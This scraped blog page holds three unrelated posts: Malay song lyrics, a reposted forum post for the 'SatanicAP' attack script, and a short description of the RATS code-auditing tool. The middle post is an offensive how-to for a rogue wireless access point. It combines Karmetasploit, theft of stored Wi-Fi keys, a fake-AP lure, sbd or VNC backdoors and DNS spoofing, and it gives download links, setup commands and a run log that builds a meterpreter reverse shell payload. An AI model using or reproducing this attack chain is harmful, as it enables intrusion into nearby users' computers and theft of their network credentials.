Song Meling-Meling from Album Anok Semantan

2 12 2008

MELING MELING

Kala dulu.. meling-meling,
jenuh noreh, dapatnye sekeping,
baru jemo getoh sekerak tokdan kering,
pinjam duit orang belanja panpeir hok dindingnye zing

lewat ler ni cemuih koi rase,
Ander sluor jean baru koi beli behnye jenama,
kawan jemo tempat sekaler,
meling-meling, ambik dek orang juei de bundle.

Seiideii amatt.. Meling-meling.
Seiideii sangat.. Meling-meling.
Seiideii amatt.. Meling-meling.
Seiideii sangat.. Meling-meling.

Kala dulu, Meling-meling.
Buoh hati, orang yang nyunting..
senalo merebaih airmata tok kering-kering
Jenoh berubat mandi limar berbesen-besen,

Lewat ler ni cemuih koi rasa,
ande makwe keknye ngintai kocek koi aje,
Meling-meling,
Dia pun pergi, koi takde 3K kondo, kereta, dan kad kredit.

Seiideii amatt.. Meling-meling.
Seiideii sangat.. Meling-meling.
Seiideii amatt.. Meling-meling.
Seiideii sangat.. Meling-meling.

Kala dulu, Meling-meling,
Ander besiko, rantei doh genting.
rate koi bawok kedarat kebarok sampei ke tebing,
sudoh mandi koi naik kedarat hok tinggeinye loceng.

lewat ler ni, cemuih koi rase,
puluh ribu kawan berabih membeli kerete,
bagei gaye berbunyi seren
meling-meling koi sador-sador laptop koi licin

Kala dulu, Meling-meling,
nege kedei, modei tok musing.
Nok orang datang meghubung ngelior ngeliling,
keknye berutang dari gula sampei ke aiskrem.

Lewat ler ni,
cemuih koi rasa,
Stesen minyok kedei makan ladang kelapa,
orang lain gaji dak deme
Meling-meling, habih dipunggohnye rumoh kite.

Seiideii amatt.. Meling-meling.
Seiideii sangat.. Meling-meling.
Seiideii amatt.. Meling-meling.
Seiideii sangat.. Meling-meling.

Meling-Meling – Putra & Pyan

Untuk lagu-lagu yang lain klik link dibawah ini:-

lagu-lagu album anok semantan

Geng sekampung dan sekoloh:

Ody, Bana, Najib, Wok, Ali Ceper, Medan (Cendut), Lobo, Baharom, Pok Di, Acam, Rahman, Gruk, Hapas (Kapok), Sukri, Duan Pertang, Pian,

Hapiz (Code 10), Talat, Ar, Meri Pengkor, Pijat dan ramai lg Grup Lengkong/Jambu Rias/Paya Pelantar dan sewaktu dengannya





SatanicAP (Karmetasploit+WKG+FakeAP+VNCBackdoor)

2 11 2009

Hi everybody

The satanic AP is finished. Like the name already says, it’s an evil wireless access point. It combines Karmetasploit, Wireless Key Viewer (wkg) by hm2075, FakeAP with sbd by g0tmilk and VNC backdooring in one script (everything is done with meterpreter…).

Some important things:

- The hole script works for my IBM T43p/atheros wireless card/BT4 pre final as attacker

- The victim is Windows Vista on a Lenovo T400 with Antivir

- The WLan AP is horribly slow. Maybe it’s the mtu size, maybe not.

- There are a lot of variables which are exported at the beginning of the script, but you can change nearly everything to your needs

- You don’t need to download the programms/exes i use, you can compile/download them yourself if you don’t trust my executables:

— wkv.exe – Wireless Key View by nirsoft (maybe i modified some bits in my version), Password Recovery Tools for Windows

— sbd.exe is already on BT. I don’t use another one.

— vncbackdoor.exe -> follow pureh@tes tutorial on windows backdoor part 1 and Uploading a windows vnc backdoor part 2 , the new version of ultraVNC changed, you don’t have to do the registry stuff but pack the .ini file into the exe and run winvnc.exe -run instead of -reinstall. But that’s another story.

— fDNS is available on DNSpenTest | Get DNSpenTest at SourceForge.net

- SatanicAP can be run in five different modes:

— 0 = Karmetasploit

— 1 = Wireless Key Grabber by hm2075

— 2 = FakeAP by g0tmilk – You have to shut down your Antivirus on Windows Victim!

— 3 = Wireless Key Grabber (1) and FakeAP (2) together – Shut down Antivirus!

— 4 = UltraVNC Backdoor instead of SBD – Shut down Antivirus (and allow VNC on Win Firewall)!

— 5 = Wireless Key Grabber (1) and VNC Backdoor (4) – Shut down Antivirus (and allow VNC on Win Firewall)!

- I only implemented VNC to proof that it’s very easy to extend the script. It took about 10 lines of code

- I commented out the autometer script because i was too lazy to fix it

Here’s the script only: Uploadingit.com | Downloading File: satanicAP.sh

Here’s the script including programs/exes: Uploadingit.com | Downloading File: satanicAP.tar.gz

Here’s the howto (as short/simple as possible):

1. backup dhcpd.conf

Code:
cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak

2. Change into /root/ folder

Code:
cd /root/

3. Download Uploadingit.com | Downloading File: satanicAP.tar.gz and extract it into /root/

Code:
cd /root/
tar -zxf satanicAP.tar.gz
cd ./SAP

4. Read satanicAP.sh script to understand what it does!

5. Go through the export statements at the beginning of the script and change them to your needs. Leave everything you don’t understand

6. Make executable

Code:
chmod +x satanicAP.sh

7. Run it the first time and read its output

Code:
./satanicAP.sh

8. Start Karmetasploit and read its output

Code:
./satanicAP.sh 0 0

9. Connect with a Windows Machine to the AP and open up a browser (mine was not vulnerable)

10. Back in Backtrack you can test other combinations:

Code:
./satanicAP.sh 1 1

11. Disconnect and Reconnect again with the Windows Machine, open up a browser and go to Google or www.uezdfedjw.net, download the mentioned exe file from the “fon” page and execute it. On the Backtrack machine you will see Metasploit starting the “Sending Stage”. It takes about 1 minute in my lab. With vnc it takes much longer, because the vncbackdoor.exe is bigger.

12. Here is the output of the script after a successfull execution (example for ./satanicAP 5 0):

Code:

root@floyd:~/SAP# ./satanicAP.sh 5 0
[+] Satanic AP by floyd fuh
[+] Cleaning up befor I begin
Site Satanic_AP disabled.
Run '/etc/init.d/apache2 reload' to activate new configuration!
Stopping web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:09:56 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
 ... waiting .

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
mon0            Atheros         ath5k - [phy0] (removed)

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode disabled)

[+] Making dirs
mkdir: cannot create directory `/root/SAP': File exists
mkdir: cannot create directory `/root/SAP/www': File exists
mkdir: cannot create directory `/root/SAP/payload': File exists
mkdir: cannot create directory `/root/SAP/tools': File exists
mkdir: cannot create directory `/root/SAP/tools/dns_spoof': File exists
[+] Killing wicd
Stopping Network connection manager: wicd.
wicd-client: no process killed
[+] Starting Monitor Mode

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
8117    dhclient

Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy0]
                                (monitor mode enabled on mon0)

[+] Changing MAC of mon0 to 00:10:23:A2:F2:83
Current MAC: 00:1X:aX:3X:X5:X1 (unknown)
Faked MAC:   00:10:23:a2:f2:83 (Flowwise Networks, Inc.)
[+] Writing /etc/dhcp3/dhcpd.conf
[+] Setting up AP
[+] Sleeping to wait for interface
[+] Starting apache
Starting web server: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
[Mon Sep 28 18:10:07 2009] [warn] NameVirtualHost *:80 has no VirtualHosts
.
[+] Setting up VirtualHost config for Satanic AP
[+] Disabling Apache2 site default, enabling Satanic_AP
Site default already disabled
Enabling site Satanic_AP.
Run '/etc/init.d/apache2 reload' to activate new configuration!
[+] Reloading Apache2
Reloading web server config: apache2apache2: apr_sockaddr_info_get() failed for floyd
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1 for ServerName
.
[+] Compile payload fon_access_2.7.exe (reverse tcp shell)
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 272
Options: LHOST=10.0.0.1,LPORT=5555
[+] Writing proof file
[+] Writing common proof file script
[+] Writing FakeAP script
[+] Copying the second payload vncbackdoor.exe/sbd.exe to sys32.exe
[+] Writing Metasploit script
[+] Starting Metasploit
[+] Setting up interfaces and iptables
[+] Starting DHCP
Internet Systems Consortium DHCP Server V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 13 leases to leases file.
Listening on LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on   LPF/at0/00:10:23:a2:f2:83/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
[+] Starting DNS Spoof
[+] You probably have to connect to 10.0.0.100::1050
[+] The password is satanicAPConnect
For further explanation watch pureh@tes http://blip.tv/file/577132
as well as http://uploads.blip.tv/file/577932 . The new version of UltaVNC uses
a .ini file instead of registry and you just have to winvnc.exe -run instead of
winvnc.exe -reinstall.
[+] Satanic AP over and out. floyd fuh

 

Thanks to bro Floyd from remote-exploit forum for this script

http://forums.remote-exploit.org/wireless/27147-satanicap-karmetasploit-wkg-fakeap-vncbackdoor-2.html





RATS – Rough Auditing Tool for Security

2 11 2009

RATS – Rough Auditing Tool for Security – is an open source tool developed and maintained by Secure Software security engineers. Secure Software was acquired by Fortify Software, Inc. RATS is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions.

RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, along with describing the problem, and potentially suggest remedies. It also provides a relative assessment of the potential severity of each problem, to better help an auditor prioritize. This tool also performs some basic analysis to try to rule out conditions that are obviously not problems.

As its name implies, the tool performs only a rough analysis of source code. It will not find every error and will also find things that are not errors. Manual inspection of your code is still necessary, but greatly aided with this tool.

Requirements

RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to specify –with-expat-lib and –with-expat-include options to configure so that it can find your installation of the library and header. Expat can be found here.

You can download RATS here:

Source Code: rats-2.3.tar.gz

Windows Binary: rats-2.3-win32.zip

Or read more here.